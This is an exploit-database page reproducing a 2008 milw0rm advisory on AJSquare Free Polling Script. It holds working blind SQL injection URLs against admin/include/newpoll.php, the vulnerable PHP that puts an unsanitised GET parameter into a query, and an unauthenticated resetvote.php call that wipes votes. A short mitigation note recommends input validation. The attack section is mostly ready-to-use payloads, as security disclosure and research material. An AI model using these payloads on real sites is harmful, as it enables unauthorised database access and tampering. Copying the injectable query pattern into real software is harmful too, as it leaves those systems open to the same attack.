header-logo
Suggest Exploit
vendor:
Free Polling Script
by:
G4N0K
7.5
CVSS
HIGH
Blind SQL Injection, Reset Votes
89, 539
CWE
Product Name: Free Polling Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

AJSquare Free Polling Script (DB) Multiple Vulnerabilities

AJSquare Free Polling Script is vulnerable to Blind SQL Injection and Reset Votes. Blind SQL Injection can be exploited by sending a crafted request to the vulnerable script. The resetvote.php script can be called to reset the votes.

Mitigation:

Input validation should be used to prevent SQL Injection. Access to resetvote.php should be restricted.
Source

Exploit-DB raw data:

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   | \ | |  / _ \  | |/ /
                    | |  _  | || |_  |  \| | | | | | | ' / 
                    | |_| | |__   _| | |\  | | |_| | | . \ 
                     \____|    |_|   |_| \_|  \___/  |_|\_\

==============================================================================
	AJSquare Free Polling Script (DB) Multiple Vulnerabilities
==============================================================================

	[»] Script:             [ AJSquare Free Polling Script DataBase Version ]
	[»] Language:           [ PHP ]
	[»] Website:            [ http://www.ajsquare.com/resources/dpoll.php?resource=free_script ]
	[»] Type:               [ Free ]
	[»] Report-Date:        [ 10.11.2008 ]
	[»] Founder:            [ G4N0K <mail.ganok[at]gmail.com> ]


===[ XPL ]===

	[1][!] Blind SQLi (MQ = off)
		[»] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=5/*		True
		[»] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=4/*		False
		
		[../admin/include/newpoll.php]
		
			<?php
			require 'connect.php';
			$ques = $_GET[ques];
			$total = $_GET[total];
			for($i=1;$i<=$total;$i++)
				{
					$val[] = array($_GET["val".$i]);
				}

			$sqlnew = "select * from newpoll where question='$ques'";
			$resnew = mysql_query($sqlnew);
			
		[../admin/include/newpoll.php]
	
	
	

	[2][!] Reset Votes - Just call resetvote.php ;)
		[»] http://127.0.0.1/[path]/admin/resetvote.php


	
	
===[ Greetz ]===

	[»] ALLAH
	[»] Tornado2800 <Tornado2800[at]gmail.com>
	[»] Hussain-X <darkangel_g85[at]yahoo.com>

	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
	//ALLAH,forgimme...

===============================================================================
exit();
===============================================================================

# milw0rm.com [2008-11-10]